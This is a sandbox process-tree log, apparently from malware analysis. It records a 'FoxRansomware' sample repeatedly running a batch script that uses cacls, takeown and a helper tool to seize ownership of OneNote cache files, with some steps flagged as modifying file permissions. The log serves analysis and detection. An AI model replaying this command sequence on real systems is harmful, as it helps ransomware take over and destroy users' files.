C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""2⤵PID:3324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C3⤵PID:5312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"3⤵PID:5592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000006.bin" -nobanner3⤵PID:3260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000006.bin" -nobanner4⤵PID:3916
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""2⤵PID:6036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C3⤵PID:3424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"3⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000J.bin" -nobanner3⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000J.bin" -nobanner4⤵PID:4148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""2⤵PID:5764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C3⤵PID:2908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"3⤵PID:1148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000U.bin" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000U.bin" -nobanner4⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""2⤵PID:5348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C3⤵PID:1416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"3⤵PID:5488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000018.bin" -nobanner3⤵PID:492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000018.bin" -nobanner4⤵PID:3096
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""2⤵PID:3280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"3⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000052.bin" -nobanner3⤵PID:4184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000052.bin" -nobanner4⤵PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""2⤵PID:4828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C3⤵PID:5812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"3⤵
- Modifies file permissions
PID:5412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000009B.bin" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000009B.bin" -nobanner4⤵PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""2⤵PID:5296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"3⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000009L.bin" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000009L.bin" -nobanner4⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""2⤵PID:6048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C3⤵PID:3276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"3⤵PID:5620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000A6.bin" -nobanner3⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000A6.bin" -nobanner4⤵PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""2⤵PID:3452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"3⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000AH.bin" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000AH.bin" -nobanner4⤵PID:388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""2⤵PID:936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C3⤵PID:4016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000B7.bin" -nobanner3⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000B7.bin" -nobanner4⤵PID:5312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""2⤵PID:296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C3⤵PID:4776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"3⤵PID:4832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006U.bin" -nobanner3⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006U.bin" -nobanner4⤵PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""2⤵PID:5856
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C3⤵PID:5824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"3⤵PID:5280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000078.bin" -nobanner3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000078.bin" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""2⤵PID:6088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C3⤵PID:5492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007I.bin" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007I.bin" -nobanner4⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""2⤵PID:3064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C3⤵PID:492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"3⤵
- Modifies file permissions
PID:5552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008H.bin" -nobanner3⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008H.bin" -nobanner4⤵PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C3⤵PID:2472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"3⤵PID:4964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000008.bin" -nobanner3⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000008.bin" -nobanner4⤵PID:3280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""2⤵PID:5984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C3⤵PID:3436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"3⤵
- Modifies file permissions
PID:2088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000M.bin" -nobanner3⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000M.bin" -nobanner4⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""2⤵PID:2508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C3⤵PID:6000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"3⤵
- Modifies file permissions
PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000010.bin" -nobanner3⤵PID:1304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000010.bin" -nobanner4⤵PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""2⤵PID:4940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"3⤵PID:5576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000054.bin" -nobanner3⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000054.bin" -nobanner4⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""2⤵PID:6132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C3⤵PID:3812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"3⤵PID:5924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000070.bin" -nobanner3⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000070.bin" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""2⤵PID:5304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C3⤵PID:2856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"3⤵
- Modifies file permissions
PID:4452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007A.bin" -nobanner3⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007A.bin" -nobanner4⤵PID:6076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""2⤵PID:4408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"3⤵PID:5636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007K.bin" -nobanner3⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007K.bin" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""2⤵PID:284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C3⤵PID:3320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"3⤵PID:5744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000F.bin" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000F.bin" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C3⤵PID:3908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"3⤵PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000Q.bin" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000Q.bin" -nobanner4⤵PID:1148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""2⤵PID:4148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C3⤵PID:5796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"3⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000014.bin" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000014.bin" -nobanner4⤵PID:5808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:4588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000058.bin" -nobanner3⤵PID:696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000058.bin" -nobanner4⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:3688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:5748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007E.bin" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007E.bin" -nobanner4⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:5820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:4828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:4204
-
-
